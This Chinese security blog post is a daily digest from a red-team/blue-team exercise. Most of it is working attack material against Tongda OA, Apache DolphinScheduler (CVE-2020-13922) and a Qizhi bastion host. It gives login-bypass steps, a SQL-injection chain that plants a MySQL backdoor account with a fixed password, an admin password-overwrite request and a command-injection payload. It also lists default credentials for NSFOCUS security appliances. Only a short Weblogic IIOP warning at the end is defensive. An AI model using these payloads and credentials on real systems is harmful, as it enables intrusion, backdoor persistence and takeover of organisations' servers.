HW平安夜: 09/14 快乐源泉

2020-09-18 5,567

红队小伙子都很有精神哦,蜜罐数据全都是你的脚印~


红队大叔: 叮! 新的主机上线。这得晚上加餐了吧。

蓝队小哥: 枉我三日的痴心,终究是错付了她。


0、通达OA任意用户登录

1、首先访问 /ispirit/login_code.php 获取 codeuid

2、访问 /general/login_code_scan.php 提交 post 参数:

uid=1&codeuid={9E908086-342B-2A87-B0E9-E573E226302A}

3、最后访问 /ispirit/login_code_check.php?codeuid=xxx

这样 $_SESSION 里就有了登录的信息了。



1、通达OA v11.7 后台SQL注入

来源:https://mp.weixin.qq.com/s/8rvIT1y_odN2obJ1yAvLbw

利用条件:需要登录权限,文章作者给出了利用链注入加mysql权限,又是写木马的。确实用起来很舒服。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

select%20if((substr(user(),1,1)=%27r%27),1,power(9999,99))

1、添加一个mysql用户

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

2、给创建的ateam666账户添加mysql权限。

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('ateam666' AS Binary(5));

3、刷新数据库就可以登录到数据库啦。

/general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;

4、通达OA配置mysql默认是不开启外网访问的所以需要修改mysql授权登录。

/general/hr/manage/query/delete_cascade.php?condition_cascade=

grant all privileges ON mysql.* TO 'ateam666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

5、接下来就是考验mysql提权功底的时候啦 233...



2、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922]

大概就长这个样子,默认密码[HW平安夜: 09/12 态势感知]有写到。

POST /dolphinscheduler/users/update
id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone=


3、齐治堡垒机远程代码执行

据说还是另外一个版本是java的。

POST /shterm/listener/tui_update.php

a=["t';import os;os.popen('whoami')#"]


4、绿盟安全产品默认密码排查列表

来源:群里老大哥

IPS入侵防御系统、SAS­H运维安全管理系统、SAS安全审计系统、DAS数据库审计系统、RSAS远程安全评估系统、WAF WEB应用防护系统

sysauditor/sysauditor

sysmanager/sysmanager

supervisor/supervisor

maintainer/maintainer

webpolicy/webpolicy

sysadmin/sysadmin

conadmin/conadmin

supervis/supervis

webaudit/webaudit

sysadmin/sysadmin

conadmin/nsfocus

weboper/weboper

auditor/auditor

weboper/weboper

nsadmin/nsadmin

admin/nsfocus

admin/admin

shell/shell


0day预警:
来源: 前天说的“协同banIP蓝队都是第1”

Weblogic  GIOP 反序列化漏洞(0day),攻击者通过反序列化可以进行任意代码执行,请各单位立即排查。

建议关闭Weblogic IIOP 协议,关闭方式如下:

1.打开Weblogic 控制台。

2.选择“服务”->”AdminServer”->”协议”,取消“启用 IIOP”的勾选。

3.重启 Weblogic 项目,使配置生效。



回顾一下HW 2020/09/14:

今天也护网行动也慢慢走向高潮了,高级的玩法也已经有人开始玩起来了。

看来明天去上班要带上一根棍子了,敲几个无人机下来拿去卖钱哼哼。


漏洞利用工具火爆,不要随便在微信群内下载使用。2333


素材均来自网络

本文作者:渗了个透

本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/141154.html

Tags:
评论  (0)
快来写下你的想法吧!

渗了个透

文章数:10 积分: 140

安全问答社区

安全问答社区

脉搏官方公众号

脉搏公众号